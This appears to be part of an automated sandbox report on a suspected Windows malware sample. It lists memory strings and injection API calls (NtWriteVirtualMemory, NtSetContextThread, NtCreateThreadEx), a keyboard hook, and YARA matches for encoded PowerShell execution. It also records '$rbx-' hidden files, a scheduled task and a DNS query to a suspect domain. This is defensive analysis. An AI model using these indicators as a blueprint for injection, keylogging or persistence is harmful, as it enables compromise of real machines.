Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.pdbh source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdbiy source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbP source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb N source: WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.CSharp.pdb@ source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C2D894 FindFirstFileExW,18_2_0000022123C2D894
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_0000022123C2DA18
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C5D894 FindFirstFileExW,18_2_0000022123C5D894
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_0000022123C5DA18
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000013F08E6DA18
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E6D894 FindFirstFileExW,19_2_0000013F08E6D894
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000013F08E9DA18
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E9D894 FindFirstFileExW,19_2_0000013F08E9D894
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186DD894 FindFirstFileExW,36_2_000001FD186DD894
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,36_2_000001FD186DDA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DABDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_0000017C6DABDA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DABD894 FindFirstFileExW,37_2_0000017C6DABD894
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_0000017C6DD7DA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD7D894 FindFirstFileExW,37_2_0000017C6DD7D894
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC64D894 FindFirstFileExW,38_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC67D894 FindFirstFileExW,38_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AED894 FindFirstFileExW,39_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_00000202C0B1DA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B1D894 FindFirstFileExW,39_2_00000202C0B1D894
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A66130D894 FindFirstFileExW,40_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDCD894 FindFirstFileExW,41_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002BAAEDFDA18
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDFD894 FindFirstFileExW,41_2_000002BAAEDFD894
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_000002705306DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000002705306DA18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_000002705306D894 FindFirstFileExW,42_2_000002705306D894
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: azure-winsecure.com
Source: Microsoft-Windows-LiveId%4Operational.evtx.49.drString found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: powershell.exe, 00000007.00000002.2143087471.000001A697909000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2475973230.000002A7E1F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000027.00000000.2475625757.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2511424538.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3028177697.00000202C0249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000027.00000002.3028177697.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475625757.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F2783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475347733.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000027.00000000.2475625757.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2511424538.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3028177697.00000202C0249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000027.00000000.2475625757.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2511424538.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3028177697.00000202C0249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000032.00000002.3031906020.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000027.00000002.3041073234.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476237818.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3042577536.00000202C03A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000019.00000002.3053661070.0000016A83A50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.7.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xGa
Source: powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000023.00000002.2477927278.000002A7E3703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.drString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B80E0EA NtWriteVirtualMemory,35_2_00007FFD9B80E0EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B80E112 NtSetContextThread,35_2_00007FFD9B80E112
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B80E132 NtResumeThread,35_2_00007FFD9B80E132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B80E0B8 NtUnmapViewOfSection,35_2_00007FFD9B80E0B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B810FF4 NtResumeThread,35_2_00007FFD9B810FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B810F30 NtSetContextThread,35_2_00007FFD9B810F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B810A4E NtUnmapViewOfSection,35_2_00007FFD9B810A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B80E122 NtSetContextThread,35_2_00007FFD9B80E122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B810C6D NtWriteVirtualMemory,35_2_00007FFD9B810C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B80E088 NtUnmapViewOfSection,35_2_00007FFD9B80E088
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,37_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,38_2_00000225DC642C80
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW,39_2_00000202C0AE2300
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDF2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,41_2_000002BAAEDF2C80
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_0000027053062300 NtQuerySystemInformation,StrCmpNIW,42_2_0000027053062300
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\20241003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\20241003\PowerShell_transcript.745481.0eedoBAF.20241003232435.txt
Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-U7ejKPED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_qh5es4es.ivl.ps1
Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000022123BFCC9418_3_0000022123BFCC94
Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000022123BF23F018_3_0000022123BF23F0
